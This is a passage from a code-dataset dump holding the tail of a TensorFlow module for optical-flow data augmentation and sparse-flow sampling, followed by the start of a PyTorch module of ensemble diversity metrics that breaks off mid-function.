be applied to img1 and optionally img2 (if we use image pairs)\ndef distort_colour(image, num_permutations=4):\n distortion_params = {'max_delta_brightness': 51., # around 0.2 specified in FlowNet2.0\n 'lower_saturation': 0.5, # FN2 samples from [0.5, 2] (halving/doubling saturation)\n 'upper_saturation': 1.5,\n 'max_delta_hue': 0.2, # FN2 samples randomly for gamma instead\n 'lower_contrast': 0.2, # in flownet is [-0.8, 0.4] for a range of [-1, 1]?\n 'upper_contrast': 1.4}\n\n colour_id = tf.random_uniform([], maxval=num_permutations, dtype=tf.int32)\n # image = tf.switch_case(colour_id, branch_fns={\n # 0: lambda: distort_colour_zero(image, dist_params=distortion_params),\n # 1: lambda: distort_colour_one(image, dist_params=distortion_params),\n # 2: lambda: distort_colour_two(image, dist_params=distortion_params),\n # 3: lambda: distort_colour_three(image, dist_params=distortion_params)},\n # default=lambda: distort_colour_zero(image, dist_params=distortion_params))\n\n image = tf.case(\n {tf.equal(colour_id, tf.constant(0)): lambda: distort_colour_zero(image, dist_params=distortion_params),\n tf.equal(colour_id, tf.constant(1)): lambda: distort_colour_one(image, dist_params=distortion_params),\n tf.equal(colour_id, tf.constant(2)): lambda: distort_colour_two(image, dist_params=distortion_params),\n tf.equal(colour_id, tf.constant(3)): lambda: distort_colour_three(image, dist_params=distortion_params),\n },\n default=lambda: distort_colour_zero(image, dist_params=distortion_params), exclusive=True)\n # The random_* ops do not necessarily clamp.\n return tf.clip_by_value(image, 0.0, 1.0)\n\n\n# Note: not used ATM due to mismatch in net dimensions (first conv) in validation and training (tf.AUTO_REUSE)\ndef random_crop(img_list, crop_h, crop_w):\n img_size = tf.shape(img_list[0])\n # crop image and flow\n rand_offset_h = tf.random_uniform([], 0, img_size[0] - crop_h + 1, dtype=tf.int32)\n rand_offset_w = tf.random_uniform([], 0, img_size[1] - crop_w + 1, dtype=tf.int32)\n\n for i, img in enumerate(img_list):\n img_list[i] = tf.image.crop_to_bounding_box(img, rand_offset_h, rand_offset_w, crop_h, crop_w)\n\n return img_list\n\n\ndef flow_vertical_flip(flow):\n flow = tf.image.flip_up_down(flow)\n flow_u, flow_v = tf.unstack(flow, axis=-1)\n flow_v = flow_v * -1\n flow = tf.stack([flow_u, flow_v], 
axis=-1)\n return flow\n\n\ndef flow_horizontal_flip(flow):\n flow = tf.image.flip_left_right(flow)\n flow_u, flow_v = tf.unstack(flow, axis=-1)\n flow_u = flow_u * -1\n flow = tf.stack([flow_u, flow_v], axis=-1)\n return flow\n\n\ndef random_flip(img_list):\n is_flip = tf.random_uniform([2], minval=0, maxval=2, dtype=tf.int32)\n\n for i in range(len(img_list)):\n img_list[i] = tf.where(is_flip[0] > 0, tf.image.flip_left_right(img_list[i]), img_list[i])\n img_list[i] = tf.where(is_flip[1] > 0, tf.image.flip_up_down(img_list[i]), img_list[i])\n return img_list\n\n\ndef random_flip_with_flow(img_list, flow_list):\n is_flip = tf.random_uniform([2], minval=0, maxval=2, dtype=tf.int32)\n for i in range(len(img_list)):\n img_list[i] = tf.where(is_flip[0] > 0, tf.image.flip_left_right(img_list[i]), img_list[i])\n img_list[i] = tf.where(is_flip[1] > 0, tf.image.flip_up_down(img_list[i]), img_list[i])\n for i in range(len(flow_list)):\n flow_list[i] = tf.where(is_flip[0] > 0, flow_horizontal_flip(flow_list[i]), flow_list[i])\n flow_list[i] = tf.where(is_flip[1] > 0, flow_vertical_flip(flow_list[i]), flow_list[i])\n return img_list, flow_list\n\n\ndef random_channel_swap(img_list):\n channel_permutation = tf.constant([[0, 1, 2],\n [0, 2, 1],\n [1, 0, 2],\n [1, 2, 0],\n [2, 0, 1],\n [2, 1, 0]])\n rand_i = tf.random_uniform([], minval=0, maxval=6, dtype=tf.int32)\n permutation = channel_permutation[rand_i]\n\n for i in range(len(img_list)):\n img = img_list[i]\n channel_1 = img[:, :, permutation[0]]\n channel_2 = img[:, :, permutation[1]]\n channel_3 = img[:, :, permutation[2]]\n img_list[i] = tf.stack([channel_1, channel_2, channel_3], axis=-1)\n return img_list\n\n\ndef random_channel_swap_single(image):\n channel_permutation = tf.constant([[0, 1, 2],\n [0, 2, 1],\n [1, 0, 2],\n [1, 2, 0],\n [2, 0, 1],\n [2, 1, 0]])\n rand_i = tf.random_uniform([], minval=0, maxval=6, dtype=tf.int32)\n permutation = channel_permutation[rand_i]\n channel_1 = image[:, :, permutation[0]]\n channel_2 = image[:, :, permutation[1]]\n channel_3 = image[:, :, permutation[2]]\n image = tf.stack([channel_1, channel_2, channel_3], axis=-1)\n return image\n\n\ndef flow_resize(flow, out_size, is_scale=True, method=0):\n \"\"\"\n method: 0 mean bilinear, 1 means nearest, 2 bicubic and 3 area\n See: https://www.tensorflow.org/api_docs/python/tf/image/ResizeMethod\n \"\"\"\n flow_size = tf.to_float(tf.shape(flow)[-3:-1])\n flow = tf.image.resize_images(flow, out_size, method=method, align_corners=True)\n if is_scale:\n scale = tf.to_float(out_size) / flow_size\n scale = tf.stack([scale[1], scale[0]])\n flow = tf.multiply(flow, scale)\n return flow\n\n\n# Auxiliar functions for sampling\ndef case_sparse(num_cases=2):\n density_id = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)\n density = tf.case(\n {tf.equal(density_id, tf.constant(0)): lambda: tf.random_uniform([], minval=0.01, maxval=1., dtype=tf.float32),\n tf.equal(density_id, tf.constant(1)): lambda: tf.random_uniform([], minval=1., maxval=10., dtype=tf.float32),\n },\n default=lambda: tf.random_uniform([], minval=1., maxval=10., dtype=tf.float32), exclusive=True)\n return density, density_id\n\n\ndef case_dense(num_cases=4, ff_like=-1):\n density_id = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)\n ff_like_bool = tf.cond(tf.greater(tf.convert_to_tensor(ff_like), tf.constant(0)),\n lambda: tf.constant(True), lambda: tf.constant(False))\n density = tf.case(\n {tf.logical_and(tf.equal(density_id, tf.constant(0)), tf.equal(ff_like_bool, tf.constant(False))):\n 
lambda: tf.random_uniform([], minval=10., maxval=25., dtype=tf.float32),\n tf.logical_and(tf.equal(density_id, tf.constant(1)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=25., maxval=50., dtype=tf.float32),\n tf.logical_and(tf.equal(density_id, tf.constant(2)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=50., maxval=75., dtype=tf.float32),\n tf.logical_and(tf.equal(density_id, tf.constant(3)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=75., maxval=90., dtype=tf.float32),\n tf.equal(ff_like_bool, tf.constant(True)): lambda: tf.random_uniform([], minval=65., maxval=85.,\n dtype=tf.float32),\n },\n default=lambda: tf.random_uniform([], minval=25., maxval=50., dtype=tf.float32), exclusive=True)\n return density, density_id\n\n\ndef get_sampling_density(dense_or_sparse, num_ranges=(4, 2), ff_like=-1):\n density, density_id = tf.cond(tf.greater(dense_or_sparse, tf.constant(0)),\n lambda: case_dense(num_cases=num_ranges[0], ff_like=ff_like),\n lambda: case_sparse(num_cases=num_ranges[1]))\n tf.summary.scalar('debug/density_id', density_id)\n return density\n\n\ndef get_random_offset_and_crop(image_shape, density):\n \"\"\"\n computes random crop sizes and offsets for a given image_shape (height, width) and sampling density\n :param image_shape:\n :param density:\n :return:\n \"\"\"\n p_fill = tf.divide(density, 100.0) # target_density expressed in %\n bbox_area = tf.multiply(p_fill, tf.cast(tf.multiply(image_shape[0], image_shape[1]), dtype=tf.float32))\n num_aspect_ratios = 5\n aspect_ratios = tf.constant([16 / 9, 4 / 3, 3 / 2, 3 / 1, 4 / 5])\n aspect_id = tf.random_uniform([], maxval=num_aspect_ratios, dtype=tf.int32)\n aspect_ratio = aspect_ratios[aspect_id]\n # Compute width and height based of random aspect ratio and bbox area\n # bbox = w * h, AR = w/h\n\n # Check crop dimensions are plausible, otherwise crop them to fit (this alters the density we were sampling at)\n crop_w = tf.cast(tf.round(tf.sqrt(tf.multiply(tf.cast(bbox_area, dtype=tf.float32), aspect_ratio))), dtype=tf.int32)\n crop_h = tf.cast(tf.round(tf.divide(tf.cast(crop_w, dtype=tf.float32), aspect_ratio)), dtype=tf.int32)\n\n # Check crop dimensions are plausible, otherwise crop them to fit (this alters the density we were sampling at)\n crop_h = tf.cond(tf.greater(crop_h, tf.constant(image_shape[0])),\n lambda: tf.constant(image_shape[0] - 1), lambda: crop_h)\n crop_w = tf.cond(tf.greater(crop_w, tf.constant(image_shape[1])),\n lambda: tf.constant(image_shape[1] - 1), lambda: crop_w)\n\n rand_offset_h = tf.random_uniform([], 0, image_shape[0] - crop_h + 1, dtype=tf.int32)\n rand_offset_w = tf.random_uniform([], 0, image_shape[1] - crop_w + 1, dtype=tf.int32)\n\n return rand_offset_h, rand_offset_w, crop_h, crop_w\n\n\ndef set_range_to_zero(matches, width, offset_h, offset_w, crop_h, crop_w):\n range_rows = tf.range(offset_h, offset_h + crop_h, dtype=tf.int32)\n range_cols = tf.range(offset_w, offset_w + crop_w, dtype=tf.int32)\n rows, cols = tf.meshgrid(range_rows, range_cols)\n rows_flatten = tf.reshape(rows, [-1])\n cols_flatten = tf.reshape(cols, [-1])\n\n # Get absolute indices as rows * width + cols\n indices = tf.add(tf.multiply(rows_flatten, width), cols_flatten)\n zeros = tf.zeros(tf.shape(indices), dtype=tf.float32)\n matches = tf.scatter_update(matches, indices, zeros)\n # numpy: matches[rand_offset_h:rand_offset_h + crop_h, rand_offset_w: rand_offset_w + crop_w] = 0\n return matches\n\n\ndef 
body(matches, density, height, width): # what to do once the while loop condition is met\n matches, density, height, width = corrupt_sparse_flow_once(matches, density, height, width)\n return matches, density, height, width\n\n\ndef cond(matches, density, height, width):\n return tf.greater(tf.random_uniform([], maxval=2, dtype=tf.int32), 0)\n\n\ndef corrupt_sparse_flow_loop(matches, density, height=384, width=512):\n # Perturbate always once (at least)\n matches = corrupt_sparse_flow_once(matches, density, height, width)\n # TODO: the loop does not work with the following error:\n # TypeError: List of Tensors when single Tensor expected (try in the future)\n # For now, randomly corrupt a second time (if applies)\n # Draw a random number within 0, 1. If 1, keep corrupting the sparse flow (matches mask) with holes\n # inputs = [matches, density, height, width]\n # c = lambda ins: cond(ins)\n # b = lambda ins: body(ins)\n # matches, density, height, width = tf.while_loop(cond, body, [matches, density, height, width])\n # result is (matches, density, height, width) where all have not been changed but matches\n # matches = result[0]\n matches = tf.cond(tf.greater(tf.random_uniform([], maxval=2, dtype=tf.int32), 0),\n lambda: corrupt_sparse_flow_once(matches, density, height, width),\n lambda: return_identity_one(matches))\n\n return matches\n\n\ndef corrupt_sparse_flow_once(matches, density, height=384, width=512):\n # Assumption: matches is already a flatten array\n inv_fraction = tf.random_uniform([], minval=4., maxval=12., dtype=tf.float32)\n rand_offset_h, rand_offset_w, crop_h, crop_w = get_random_offset_and_crop((height, width),\n tf.divide(density, inv_fraction))\n matches = set_range_to_zero(matches, width, rand_offset_h, rand_offset_w, crop_h, crop_w)\n return matches\n\n\ndef return_identity(x, y):\n return tf.identity(x), tf.identity(y)\n\n\ndef return_identity_one(x):\n return tf.identity(x)\n\n\ndef mask_to_sparse_flow(sampling_mask, gt_flow):\n # Assumption, sampling_mask is (height x width) (int32), equivalent to matches but in int32 and in 2D (not 3D)\n sampling_mask = sampling_mask[:, :, tf.newaxis]\n sampling_mask_rep = tf.tile(sampling_mask, [1, 1, 2])\n sampling_mask_flatten = tf.reshape(sampling_mask_rep, [-1])\n sampling_mask_flatten_where = tf.where(tf.equal(sampling_mask_flatten, 1))\n sampling_mask_flatten_where = tf.reshape(sampling_mask_flatten_where, [-1])\n\n gt_flow_flatten = tf.reshape(gt_flow, [-1])\n gt_flow_sampling_mask = tf.boolean_mask(gt_flow_flatten, tf.equal(sampling_mask_flatten, 1))\n zeros = lambda: tf.zeros(tf.reduce_prod(gt_flow.shape), dtype=tf.float32)\n sparse_flow = tf.Variable(initial_value=zeros, dtype=tf.float32, trainable=False)\n sparse_flow = tf.scatter_update(sparse_flow, sampling_mask_flatten_where, gt_flow_sampling_mask)\n sparse_flow = tf.reshape(sparse_flow, gt_flow.shape)\n return sparse_flow\n\n\ndef perturbate_dm_matches(dm_matches, dm_flow, density):\n # Pick random num_picks from matches_indices randomly and set them to 0 (and the flow to 0.0)\n percentage = 10\n height, width, _ = dm_matches.get_shape().as_list()\n percentage2perturbate = tf.random_uniform([], minval=percentage - percentage/4, maxval=percentage + percentage/4,\n dtype=tf.float32)\n percentage_of_density = tf.multiply(tf.divide(percentage2perturbate, 100.0), density)\n p_zeros = tf.divide(percentage_of_density, 100.0)\n perturbating_mask = tf.multinomial(tf.log([[p_zeros, 1 - p_zeros]]), height * width, output_dtype=tf.int32)\n perturbating_mask = 
tf.reshape(perturbating_mask, (height, width))\n perturbated_mask = tf.cast(tf.multiply(tf.reshape(dm_matches, (height, width)), perturbating_mask), dtype=tf.int32)\n matches = tf.cast(tf.expand_dims(perturbated_mask, -1), dtype=tf.float32)\n\n sparse_flow = mask_to_sparse_flow(sampling_mask=perturbated_mask, gt_flow=dm_flow)\n\n return matches, sparse_flow\n\n\ndef random_perturbation_dm_matches(dm_matches, dm_flow, density):\n aux_choice = tf.random_uniform([], maxval=2, dtype=tf.int32) # 0 or 1\n dm_matches, dm_flow = tf.cond(tf.greater(aux_choice, tf.constant(0)), lambda: perturbate_dm_matches(dm_matches,\n dm_flow,\n density),\n lambda: return_identity(dm_matches, dm_flow))\n\n return dm_matches, dm_flow\n\n\n# TODO: not working at the moment, yielding some weird results (offset grids with multiple, non-regular crossings)\n# Careful, TB subsamples images when showing smaller image, click on it to check original size (binary images change\n# drastically\ndef sample_sparse_grid_like(gt_flow, target_density=75, height=384, width=512):\n print(\"sample_sparse_grid_like\")\n # Important: matches is already normalised to [0, 1]\n num_samples = tf.multiply(tf.multiply(tf.divide(target_density, 100.0), height), width)\n aspect_ratio = tf.divide(width, height)\n # Compute as in invalid_like for a random box to know the number of samples in horizontal and vertical\n num_samples_w = tf.cast(tf.round(tf.sqrt(tf.multiply(num_samples, aspect_ratio))),\n dtype=tf.int32)\n num_samples_h = tf.cast(tf.round(tf.divide(tf.cast(num_samples_w, dtype=tf.float32), aspect_ratio)),\n dtype=tf.int32)\n # Check crop dimensions are plausible, otherwise crop them to fit (this alters the density we were sampling at)\n num_samples_h = tf.cond(\n tf.greater(num_samples_h, tf.constant(height)), lambda: tf.constant(height, dtype=tf.int32),\n lambda: num_samples_h)\n num_samples_w = tf.cond(\n tf.greater(num_samples_w, tf.constant(width)), lambda: tf.constant(width, dtype=tf.int32),\n lambda: num_samples_w)\n\n delta_rows = tf.cast((height - 1 - 0) / num_samples_h, tf.float32)\n sample_points_h = tf.cast(tf.round(tf.range(start=0, limit=height, delta=delta_rows, dtype=tf.float32)),\n dtype=tf.int32)\n delta_cols = tf.cast((width - 1 - 0) / num_samples_w, tf.float32)\n sample_points_w = tf.cast(tf.round(tf.range(start=0, limit=width, delta=delta_cols, dtype=tf.float32)),\n dtype=tf.int32)\n # Create meshgrid of all combinations (i.e.: coordinates to sample at)\n rows, cols = tf.meshgrid(sample_points_h, sample_points_w, indexing='ij')\n rows_flatten = tf.reshape(rows, [-1])\n cols_flatten = tf.reshape(cols, [-1])\n\n # Compute absolute indices as row * width + cols\n indices = tf.add(tf.multiply(rows_flatten, width), cols_flatten)\n ones = tf.ones(tf.shape(indices), dtype=tf.float32)\n zeros = lambda: tf.zeros((height * width), dtype=tf.float32)\n matches = tf.Variable(initial_value=zeros, trainable=False)\n\n matches = tf.scatter_update(matches, indices, ones) # all 1D tensors\n\n # Randomly subtract a part with a random rectangle (superpixels in the future)\n corrupt_mask = tf.random_uniform([], maxval=2, dtype=tf.int32)\n matches = tf.cond(tf.greater(corrupt_mask, tf.constant(0)), lambda: corrupt_sparse_flow_once(matches, target_density,\n height, width),\n lambda: return_identity_one(matches))\n\n sampling_mask = tf.reshape(matches, (height, width)) # sampling_mask of size (h, w)\n matches = tf.cast(tf.expand_dims(sampling_mask, -1), dtype=tf.float32) # convert to (h, w, 1)\n # Sample ground truth flow with given 
map\n # sampling_mask = sampling_mask[:, :, tf.newaxis]\n # sampling_mask_rep = tf.tile(sampling_mask, [1, 1, 2])\n # sampling_mask_flatten = tf.reshape(sampling_mask_rep, [-1])\n # sampling_mask_flatten_where = tf.where(\n # tf.equal(sampling_mask_flatten, tf.cast(1, dtype=sampling_mask_flatten.dtype)))\n # sampling_mask_flatten_where = tf.reshape(sampling_mask_flatten_where, [-1])\n #\n # gt_flow_sampling_mask = tf.boolean_mask(gt_flow, sampling_mask_rep)\n # zeros = lambda: tf.zeros(tf.reduce_prod(gt_flow.shape), dtype=tf.float32)\n # sparse_flow = tf.Variable(initial_value=zeros, dtype=tf.float32, trainable=False)\n # sparse_flow = tf.scatter_update(sparse_flow, sampling_mask_flatten_where, gt_flow_sampling_mask)\n # sparse_flow = tf.reshape(sparse_flow, gt_flow.shape)\n sparse_flow = mask_to_sparse_flow(sampling_mask, gt_flow)\n\n return matches, sparse_flow\n\n\ndef sample_sparse_uniform(gt_flow, target_density=75, height=384, width=512):\n print(\"sample_sparse_uniform\")\n p_fill = tf.divide(target_density, 100.0)\n samples = tf.multinomial(tf.log([[1 - p_fill, p_fill]]), height * width, output_dtype=tf.int32) # note log-prob\n sampling_mask = tf.reshape(samples, (height, width))\n # Matches with shape (h, w, 1)\n matches = tf.cast(tf.expand_dims(sampling_mask, -1), dtype=tf.float32) # convert to (h, w, 1)\n # Generate sparse flow from sampling mask (matches but without extra dimension and dtype=tf.int32)\n sparse_flow = mask_to_sparse_flow(sampling_mask, gt_flow)\n\n return matches, sparse_flow\n\n\n# Functions to sample ground truth flow with different density and probability distribution\ndef sample_sparse_invalid_like(gt_flow, target_density=75, height=384, width=512):\n print(\"sample_sparse_invalid_like\")\n # Important: matches is already normalised to [0, 1], only use those values\n rand_offset_h, rand_offset_w, crop_h, crop_w = get_random_offset_and_crop((height, width), target_density)\n\n # Define matches as 0 inside the random bbox, 1s elsewhere\n ones = lambda: tf.ones((height * width), dtype=tf.float32)\n # Assumption: matches is already a flatten array (when inputted to set_range...)\n matches = tf.Variable(initial_value=ones, dtype=tf.float32, trainable=False)\n matches = set_range_to_zero(matches, width, rand_offset_h, rand_offset_w, crop_h, crop_w)\n # (optionally) generate more invalid regions (with while_loop based on a random_value, minimum 1 more)\n matches = corrupt_sparse_flow_loop(matches, target_density * (2 / 3), height, width)\n\n # Convert back to (height, width)\n matches = tf.reshape(matches, (height, width))\n sampling_mask = tf.cast(matches, dtype=tf.int32)\n matches = tf.expand_dims(matches, -1) # convert to (h, w, 1)\n # sampling_mask = sampling_mask[:, :, tf.newaxis] # convert to (h, w, 1)\n # sampling_mask_rep = tf.tile(sampling_mask, [1, 1, 2]) # repeat 1st channel into second (h, w, 2)\n # sampling_mask_flatten = tf.reshape(sampling_mask_rep, [-1])\n # sampling_mask_flatten_where = tf.where(tf.equal(sampling_mask_flatten, 1))\n # sampling_mask_flatten_where = tf.reshape(sampling_mask_flatten_where, [-1])\n #\n # gt_flow_sampling_mask = tf.boolean_mask(gt_flow, sampling_mask_rep)\n # zeros = lambda: tf.zeros(tf.reduce_prod(gt_flow.shape), dtype=tf.float32)\n # sparse_flow = tf.Variable(initial_value=zeros, dtype=tf.float32, trainable=False)\n # sparse_flow = tf.scatter_update(sparse_flow, sampling_mask_flatten_where, gt_flow_sampling_mask)\n # sparse_flow = tf.reshape(sparse_flow, gt_flow.shape)\n sparse_flow = 
mask_to_sparse_flow(sampling_mask, gt_flow)\n\n return matches, sparse_flow\n\n\n# Comments:\n# trying to learn with different distributions mixed (invalid-like and more-or-less sparse ones may be too difficult)\n# Try only less or more dense and then fine-tuned to \"holes-like\"/invalid-like\ndef sample_from_distribution(distrib_id, density, dm_matches, dm_flow, gt_flow):\n default_density = 25 # default density to use with default uniform sampling\n height, width, _ = gt_flow.get_shape().as_list()\n # aux_choice = tf.random_uniform([], maxval=2, dtype=tf.int32) # 0 or 1\n # sample_dm = tf.cond(tf.logical_and(tf.greater(aux_choice, tf.constant(0)),\n # tf.less_equal(density, tf.constant(1.0))), lambda: tf.constant(True), lambda: tf.constant(False))\n # sample_dm = tf.cond(True if (np.random.choice([0, 1]) > 0 and density <= 1) else False\n # matches, sparse_flow = tf.switch_case(distrib_id, branch_fns={\n # 0: lambda: return_identity(dm_matches, dm_flow),\n # 1: lambda: sample_sparse_uniform(gt_flow, target_density=density, height=height, width=width),\n # 2: lambda: sample_sparse_invalid_like(gt_flow, target_density=density, height=height, width=width),\n # }, default=lambda: sample_sparse_uniform(gt_flow, target_density=default_density, height=height, width=width))\n matches, sparse_flow = tf.case(\n {\n # tf.logical_and(tf.equal(distrib_id, tf.constant(0)),\n # tf.equal(sample_dm, tf.constant(False))): lambda: sample_sparse_grid_like(\n # gt_flow, target_density=density, height=height, width=width),\n # tf.logical_and(tf.equal(distrib_id, tf.constant(0)),\n # tf.equal(sample_dm, tf.constant(True))): lambda: return_identity(dm_matches, dm_flow),\n tf.equal(distrib_id, tf.constant(0)): lambda: return_identity(dm_matches, dm_flow),\n tf.equal(distrib_id, tf.constant(1)): lambda: sample_sparse_uniform(gt_flow, target_density=density,\n height=height, width=width),\n tf.equal(distrib_id, tf.constant(2)): lambda: sample_sparse_invalid_like(gt_flow, target_density=density,\n height=height, width=width)\n },\n default=lambda: sample_sparse_uniform(gt_flow, target_density=default_density, height=height, width=width),\n exclusive=True)\n\n # Ensure we do not give an almost empty mask back\n min_percentage = 0.01\n sampled_percentage = tf.multiply(100.0, tf.divide(tf.reduce_sum(matches), tf.cast(tf.multiply(height, width),\n dtype=tf.float32)))\n tf.summary.scalar('debug/sampled_percentage', sampled_percentage)\n\n matches, sparse_flow = tf.cond(tf.greater_equal(sampled_percentage, min_percentage),\n lambda: return_identity(matches, sparse_flow),\n lambda: return_identity(dm_matches, dm_flow))\n\n return matches, sparse_flow\n\n\ndef sample_sparse_flow(dm_matches, dm_flow, gt_flow, num_ranges=(4, 2), num_distrib=2, invalid_like=-1,\n fixed_density=-1, min_val=0, ff_like=-1):\n # apply_with_random_selector does not work for our case (maybe it interferes with tf.slim or something else...)\n # use tf.case instead\n # density = apply_with_random_selector(density, lambda x, ordering: get_sampling_density(x, ordering, fast_mode),\n # num_cases=num_ranges)\n dense_or_sparse = tf.random_uniform([], minval=min_val, maxval=2, dtype=tf.int32) # 0 or 1\n # density = tf.cond(tf.logical_and(tf.equal(tf.convert_to_tensor(num_distrib), tf.constant(-1)),\n # tf.greater(tf.convert_to_tensor(fixed_density), tf.constant(0.0))),\n # lambda: tf.convert_to_tensor(fixed_density),\n # lambda: get_sampling_density(dense_or_sparse, num_ranges=num_ranges))\n density = get_sampling_density(dense_or_sparse, 
num_ranges=num_ranges, ff_like=ff_like)\n tf.summary.scalar('debug/density', density)\n\n invalid_like_tensor = tf.cond(tf.greater(tf.convert_to_tensor(invalid_like), tf.constant(0)),\n lambda: tf.constant(True), lambda: tf.constant(False))\n # Select a distribution (random uniform, invalid like or grid like with holes\n distrib_id = tf.cond(tf.equal(invalid_like_tensor, tf.constant(True)),\n # lambda: tf.constant(2),\n lambda: tf.random_uniform([], minval=2, maxval=3, dtype=tf.int32), # tf.constant(2)\n lambda: tf.random_uniform([], maxval=num_distrib, dtype=tf.int32))\n # distrib_id = tf.case(\n # {\n # tf.equal(invalid_like_tensor, tf.constant(True)): lambda: tf.constant(2),\n # tf.equal(tf.convert_to_tensor(num_distrib), tf.constant(-1)): lambda: tf.constant(1),\n # },\n # default=lambda: tf.random_uniform([], maxval=num_distrib, dtype=tf.int32), exclusive=True)\n\n # distrib_id = tf.random_uniform([], maxval=num_distrib, dtype=tf.int32) # np.random.choice(range(num_distrib))\n matches, sparse_flow = sample_from_distribution(distrib_id, density, dm_matches, dm_flow, gt_flow)\n tf.summary.scalar('debug/distrib_id', distrib_id)\n\n return matches, sparse_flow\n","sub_path":"src/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":30854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"58841192","text":"# coding=utf-8\n# Copyright 2020 The Uncertainty Metrics Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Metrics for model diversity.\"\"\"\n\nimport itertools\nimport torch\n\n\ndef disagreement(logits_1, logits_2):\n \"\"\"Disagreement between the predictions of two classifiers.\"\"\"\n preds_1 = torch.argmax(logits_1, dim=-1).type(torch.int32)\n preds_2 = torch.argmax(logits_2, dim=-1).type(torch.int32)\n return torch.mean((preds_1 != preds_2).type(torch.float32))\n\n\ndef double_fault(logits_1, logits_2, labels):\n \"\"\"Double fault [1] is the number of examples both classifiers predict wrong.\n\n Args:\n logits_1: tf.Tensor.\n logits_2: tf.Tensor.\n labels: tf.Tensor.\n\n Returns:\n Scalar double-fault diversity metric.\n\n ## References\n\n [1] Kuncheva, Ludmila I., and Christopher J. Whitaker. 
\"Measures of diversity\n in classifier ensembles and their relationship with the ensemble\n accuracy.\" Machine learning 51.2 (2003): 181-207.\n \"\"\"\n preds_1 = torch.argmax(logits_1, dim=-1).type(labels.dtype)\n preds_2 = torch.argmax(logits_2, dim=-1).type(labels.dtype)\n\n res = torch.where(preds_1 != labels)\n res = torch.stack(res).t()\n fault_1_idx = torch.squeeze(res)\n # Use int64 indices; plain indexing replaces the earlier gather call, which was missing torch.gather's required dim argument.\n fault_1_idx = fault_1_idx.type(torch.int64)\n\n preds_2_at_idx = preds_2[fault_1_idx]\n labels_at_idx = labels[fault_1_idx]\n\n double_faults = preds_2_at_idx != labels_at_idx\n double_faults = double_faults.type(torch.float32)\n return torch.mean(double_faults)\n\n\ndef logit_kl_divergence(logits_1, logits_2):\n \"\"\"Average KL divergence between logit distributions of two classifiers.\"\"\"\n probs_1 = torch.softmax(logits_1, dim=-1)\n probs_2 = torch.softmax(logits_2, dim=-1)\n vals = kl_divergence(probs_1, probs_2)\n return torch.mean(vals)\n\n\ndef kl_divergence(p, q, clip=False):\n \"\"\"Generalized KL divergence [1] for unnormalized distributions.\n\n Args:\n p: torch.Tensor.\n q: torch.Tensor.\n clip: bool.\n\n Returns:\n torch.Tensor of the Kullback-Leibler divergences per example.\n\n ## References\n\n [1] Lee, Daniel D., and H. Sebastian Seung. \"Algorithms for non-negative\n matrix factorization.\" Advances in neural information processing systems.\n 2001.\n \"\"\"\n if clip:\n p = torch.clamp(p, torch.finfo(torch.float32).eps, 1)\n q = torch.clamp(q, torch.finfo(torch.float32).eps, 1)\n return torch.sum(p * torch.log(p / q), dim=-1)\n\n\ndef lp_distance(x, y, p=1):\n \"\"\"l_p distance.\"\"\"\n diffs_abs = torch.abs(x - y)\n summation = torch.sum(torch.pow(diffs_abs, p), dim=-1)\n return torch.mean(torch.pow(summation, 1. / p), dim=-1)\n\n\ndef cosine_distance(x, y):\n \"\"\"Cosine distance between vectors x and y.\"\"\"\n x_norm = torch.sqrt(torch.sum(torch.pow(x, 2), dim=-1))\n x_norm = x_norm.view(-1, 1)\n y_norm = torch.sqrt(torch.sum(torch.pow(y, 2), dim=-1))\n y_norm = y_norm.view((-1, 1))\n normalized_x = x / x_norm\n normalized_y = y / y_norm\n return torch.mean(torch.sum(normalized_x * normalized_y, dim=-1))\n\n\n# TODO(ghassen): we could extend this to take an arbitrary list of metric fns.\ndef average_pairwise_diversity(probs, num_models, error=None):\n \"\"\"Average pairwise distance computation across models.\"\"\"\n if probs.shape[0] != num_models:\n raise ValueError('The number of models {0} does not match '\n 'the probs length {1}'.format(num_models, probs.shape[0]))\n\n pairwise_disagreement = []\n pairwise_kl_divergence = []\n pairwise_cosine_distance = []\n for pair in list(itertools.combinations(range(num_models), 2)):\n probs_1 = probs[pair[0]]\n probs_2 = probs[pair[1]]\n pairwise_disagreement.append(disagreement(probs_1, probs_2))\n pairwise_kl_divergence.append(\n torch.mean(kl_divergence(probs_1, probs_2)))\n pairwise_cosine_distance.append(cosine_distance(probs_1, probs_2))\n\n # TODO(ghassen): we could also return max and min pairwise metrics.\n average_disagreement = torch.mean(torch.stack(pairwise_disagreement))\n if error is not None:\n average_disagreement /= (error + torch.finfo(torch.float32).eps)\n average_kl_divergence = torch.mean(torch.stack(pairwise_kl_divergence))\n average_cosine_distance = torch.mean(torch.stack(pairwise_cosine_distance))\n\n return {\n 'disagreement': average_disagreement,\n 'average_kl': average_kl_divergence,\n 'cosine_similarity': average_cosine_distance\n }\n\n\ndef variance_bound(probs, labels, num_models):\n 
\"\"\"Empirical upper bound on the variance for an ensemble model.\n\n This term was introduced in arxiv.org/abs/1912.08335 to obtain a tighter\n PAC-Bayes upper bound; we use the empirical variance of Theorem 4.\n\n Args:\n probs: tensor of shape `[num_models, batch_size, n_classes]`.\n labels: tensor of sparse labels, of shape `[batch_size]`.\n num_models: number of models in the ensemble.\n\n Returns:\n A (float) upper bound on the empirical ensemble variance.\n \"\"\"\n if probs.shape[0] != num_models:\n raise ValueError('The number of models {0} does not match '\n 'the probs length {1}'.format(num_models, probs.shape[0]))\n batch_size = probs.shape[1]\n labels = labels.type(torch.int32)\n\n # batch_indices maps point `i` to its associated label `l_i`.\n batch_indices = torch.stack([torch.arange(0, batch_size), labels], dim=1)\n # Shape: [num_models, batch_size, batch_size].\n batch_indices = batch_indices * torch.ones([num_models, 1, 1])\n\n # Replicate 